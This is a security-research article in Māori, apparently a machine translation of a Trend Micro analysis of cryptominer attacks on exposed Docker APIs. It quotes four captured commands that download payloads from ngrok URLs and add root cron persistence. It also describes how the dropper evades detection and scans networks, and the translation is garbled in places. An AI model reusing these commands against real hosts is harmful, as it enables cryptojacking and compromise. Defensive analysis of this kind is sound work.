I tātarihia e matou nga raraunga i kohia ma te whakamahi i nga ipu honeypot, i hangaia e matou hei whai i nga tuma. A i kitea e matou he mahi nui mai i nga kaikeri kirikiri kore e hiahiatia, kaore ranei i whakamanahia i tukuna hei ipu nauhea ma te whakamahi i tetahi whakaahua kua whakaputaina e te hapori i runga i te Docker Hub. Ka whakamahia te ahua hei waahanga o te ratonga e tuku ana i nga kaikeri kino kino.
I tua atu, kua whakauruhia nga kaupapa mo te mahi me nga whatunga kia uru atu ki nga ipu me nga tono tata.
Ka waiho e matou o maatau honeypots, ara, me nga tautuhinga taunoa, kaore he tikanga haumaru, he whakaurunga rorohiko taapiri ranei. Kia mahara kei a Docker nga tohutohu mo te tatūnga tuatahi hei karo i nga hapa me nga whakaraerae ngawari. Engari ko nga ipu miere e whakamahia ana he ipu, i hangaia hei kite i nga whakaeke e anga ana ki te papahanga whakangao, kaua ki nga tono kei roto i nga ipu.
Ko te mahi kino kua kitea he mea rongonui na te mea kaore e hiahiatia he whakaraerae me te motuhake ano i te putanga Docker. Ko te rapu i te whirihora hee, na reira ka tuwhera, ko te ahua o nga ipu ko nga mea katoa e hiahiatia ana e te hunga whakaeke kia pangia e te maha o nga kaitoro tuwhera.
Ko te API Docker kaore i kati ka taea e te kaiwhakamahi te mahi i te whānuitanga o nga momo , tae atu ki te tiki rarangi o nga ipu e rere ana, te tiki pororakau mai i tetahi ipu motuhake, te tiimata, te whakamutu (tae atu ki te kaha) tae atu ki te hanga ipu hou mai i tetahi ahua motuhake me nga tautuhinga kua tohua.
Kei te taha maui te tikanga tuku malware. Kei te taha matau ko te taiao o te kaitukino, e taea ai te huri mamao i nga whakaahua.
Tohaina ma te whenua o 3762 tuwhera Docker API. I runga i te rapu a Shodan i te 12.02.2019/XNUMX/XNUMX
Nga mekameka whakaeke me nga whiringa utu
Ko nga mahi kino i kitea ehara i te mea anake na te awhina o nga honeypots. Ko nga raraunga mai i Shodan e whakaatu ana kua piki ake te maha o nga Docker API e kitea ana (tirohia te kauwhata tuarua) mai i te wa i tirotirohia e matou tetahi ipu kua he te whirihora i whakamahia hei piriti ki te tuku i te rorohiko maina moni crypto Monero. I Oketopa o tera tau (2018, nga raraunga o naianei āhua. kaiwhakamaori) he 856 noa nga API tuwhera.
I te tirotiro i nga poroporo miere i kitea he hono ano te whakamahinga o te ahua ipu ki te whakamahi , he taputapu mo te whakarite hononga haumaru, te tuku whakamua ranei i nga waka mai i nga waahi ka taea e te iwi whanui ki nga waahi noho, rauemi ranei (hei tauira localhost). Ma tenei ka taea e nga kaiwhaiwhai te hanga i nga URL i te wa e tuku ana i te utu ki tetahi tūmau tuwhera. Kei raro nei nga tauira waehere mai i nga raarangi e whakaatu ana i te kino o te ratonga ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Ka taea e koe te kite, ko nga konae kua tukuake ka tangohia mai i nga URL huri tonu. He poto te ra paunga o enei URL, no reira kaore e taea te tango i nga utu utu i muri i te ra paunga.
E rua nga whiringa utu. Ko te tuatahi he miner ELF kua whakaemihia mo Linux (kua tautuhia ko Coinminer.SH.MALXMR.ATNO) e hono ana ki te puna maina. Ko te tuarua he tuhinga (TrojanSpy.SH.ZNETMAP.A) i hangaia hei tiki i etahi taputapu whatunga e whakamahia ana hei matawai i nga awhe whatunga ka rapu i nga whaainga hou.
Ko te tuhinga dropper e whakatakoto ana i nga taurangi e rua, ka whakamahia ki te tuku i te kaikeri moni crypto. Kei roto i te taurangi HOST te URL kei reira nga konae kino, a ko te taurangi RIP ko te ingoa konae (ko te tikanga, ko te hash) o te kaikeri ka tukuna. Ka huri te taurangi HOST i nga wa katoa ka huri te taurangi hash. Ka ngana ano te tuhinga ki te tirotiro kaore etahi atu kaikeri moni crypto e rere ana i runga i te tūmau kua whakaekea.
He tauira o nga taurangi HOST me te RIP, tae atu ki tetahi waahanga waehere i whakamahia hei tirotiro karekau etahi atu kaikeri e rere ana
I mua i te tiimata o te miner, ka whakaingoatia ki te nginx. Ko etahi atu putanga o tenei tuhinga ka whakaingoatia te kaikeri ki etahi atu ratonga tika kei roto i nga taiao Linux. He nui noa tenei ki te karo i nga arowhai ki te rarangi o nga tukanga whakahaere.
He ahuatanga ano te tuhinga rapu. Ka mahi tahi me te ratonga URL kotahi hei tuku i nga taputapu e tika ana. Kei roto i a raatau ko te zmap rua, e whakamahia ana ki te matawai i nga whatunga me te whiwhi rarangi o nga tauranga tuwhera. Ka utaina ano e te tuhinga tetahi atu taarua e whakamahia ana ki te taunekeneke me nga ratonga kua kitea me te whiwhi kara mai i a raatau hei whakatau i etahi atu korero mo te ratonga kua kitea (hei tauira, tona putanga).
Ka whakatauhia ano hoki e te tuhinga etahi awhe whatunga hei matawai, engari ka whakawhirinaki tenei ki te putanga o te tuhinga. Ka whakatauhia hoki nga tauranga whaainga mai i nga ratonga-i tenei keehi, Docker-i mua i te whakahaere i te karapa.
Ka kitea nga whaainga ka taea, ka tangohia aunoa nga kara mai i a raatau. Ka tātarihia hoki e te tuhinga nga whaainga i runga i nga ratonga, tono, waahanga, papaahoa paanga ranei: Redis, Jenkins, Drupal, MODX, , Docker 1.16 kiritaki me Apache CouchDB. Mena ka rite te tūmau karapa ki tetahi o enei, ka tiakina ki roto i te konae tuhinga, ka taea e nga kaiwhaiwhai te whakamahi i muri mai mo te tātari me te hacking. Ko enei konae tuhinga ka tukuna ki nga kaitoro a te hunga whakaeke ma nga hononga hihiri. Arā, ka whakamahia he URL motuhake mo ia kōnae, ko te tikanga he uaua te urunga o muri mai.
Ko te tohu whakaeke he ahua Docker, ka kitea i nga waahanga e rua e whai ake nei.
Kei runga kei te whakaingoa ano ki tetahi ratonga tika, kei raro ko te whakamahinga o te zmap ki te matawai i nga whatunga
Kei runga ko nga awhe whatunga kua tautuhia, kei raro ko nga tauranga motuhake mo te rapu ratonga, tae atu ki a Docker
E whakaatu ana te Whakaahuamata kua neke atu i te 10 miriona nga wa i tangohia ai te ahua alpine-curl
I runga i te Alpine Linux me te curl, he taputapu CLI whai rawa mo te whakawhiti i nga konae ki runga i nga momo tikanga, ka taea e koe te hanga . Ka taea e koe te kite i te ahua o mua, kua neke atu i te 10 miriona nga wa kua tangohia tenei ahua. Ko te maha o nga tangohanga ko te tikanga ko te whakamahi i tenei ahua hei waahi urunga; kua whakahoutia tenei ahua neke atu i te ono marama ki muri; kaore nga kaiwhakamahi i tango i etahi atu whakaahua mai i tenei putunga i nga wa katoa. I Docker - he huinga tohutohu hei whirihora i tetahi ipu hei whakahaere. Mena kei te he nga tautuhinga whakaurunga (hei tauira, ka waiho tuwhera te ipu mai i te Ipurangi), ka taea te whakamahi i te ahua hei tohu whakaeke. Ka taea e te hunga whakaeke te whakamahi ki te tuku utu utu mena ka kitea he ipu kua whirihora he, kua tuwhera ranei kaore i tautokona.
He mea nui kia mohio ko tenei ahua (alpine-curl) ake ehara i te kino, engari ka kite koe i runga ake nei, ka taea te whakamahi ki te mahi i nga mahi kino. Ka taea hoki te whakamahi i nga whakaahua Docker rite ki te mahi i nga mahi kino. I whakapā atu matou ki a Docker me te mahi tahi me ratou mo tenei take.
tūtohutanga
toenga mo te maha o nga kamupene, ina koa te hunga e whakatinana ana , e arotahi ana ki te whanaketanga tere me te tuku. Ko nga mea katoa e kaha ake ana i te hiahia ki te whai i nga ture arotake me te aro turuki, te hiahia ki te aro turuki i te noho muna o nga raraunga, me te nui o te kino o te kore e tutuki. Ko te whakauru i te aunoatanga haumarutanga ki roto i te huringa oranga whanaketanga ehara i te mea ka awhina noa koe ki te rapu kohao haumaru ka kore e kitea, engari ka awhina ano koe ki te whakaiti i nga kawenga mahi, penei i te whakahaere i etahi atu hanga rorohiko mo ia whakaraerae kua kitea, he whirihoranga ranei i muri i te tukunga o tetahi tono.
Ko te maiki i korerohia i roto i tenei tuhinga e whakaatu ana i te hiahia ki te whai whakaaro ki te haumaru mai i te timatanga, tae atu ki nga taunakitanga e whai ake nei:
- Mo nga kaiwhakahaere punaha me nga kaiwhakawhanake: Takina i nga wa katoa o tautuhinga API kia mohio kua whirihora nga mea katoa ki te whakaae ki nga tono mai i tetahi tūmau motuhake, whatunga o roto ranei.
- Whaia te maataapono o nga motika iti rawa: whakarite kia hainatia, kia manatokohia nga whakaahua ipu, whakawhāitihia te uru ki nga waahanga whakahirahira (ratonga whakarewa ipu) me te taapiri whakamunatanga ki nga hononga whatunga.
- Whaia me te whakahohe i nga tikanga haumaru, hei tauira. me te hanga-i roto .
- Whakamahia te matawai aunoa o nga wa whakahaere me nga whakaahua ki te tiki korero taapiri mo nga tukanga e rere ana i roto i te ipu (hei tauira, ki te kite i te tinihanga, te rapu whakaraeraetanga ranei). Ka awhina te mana tono me te aro turuki i te pono ki te whai i nga huringa rereke ki nga tūmau, nga konae, me nga waahi punaha.
Ka awhina a Trendmicro i nga kapa DevOps ki te hanga haumaru, ki te tere tere, ka whakarewahia ki hea. Trend Micro Ka whakarato i te haumarutanga kaha, ngawari, me te aunoa puta noa i te paipa DevOps o tetahi whakahaere me te whakarato i nga parenga riri maha. hei tiaki i nga mahi a tinana, mariko me te kapua i te wa whakahaere. Ka taapirihia te haumaru ipu me te и , e matawai ana i nga whakaahua ipu Docker mo te kino me nga whakaraeraetanga i nga waahi katoa o te paipa whanaketanga hei aukati i nga tuma i mua i te tuku.
Nga tohu o te taupatupatu
Hahe e pa ana:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
I roto i te Ko nga kaikorero whakangungu e whakaatu ana he aha nga whakaritenga e tika ana kia mahia i te tuatahi hei whakaiti i te tupono, ka karo ranei i te puta mai o te ahuatanga kua whakaahuatia i runga ake nei. A i te Akuhata 19-21 i te ipurangi kaha Ka taea e koe te matapaki i enei me nga raruraru haumaru rite ki nga hoa mahi me nga kaiako whakangungu i te tepu porohita, ka taea e te katoa te korero me te whakarongo ki nga mamae me nga angitu o nga hoa mahi mohio.
Source: will.com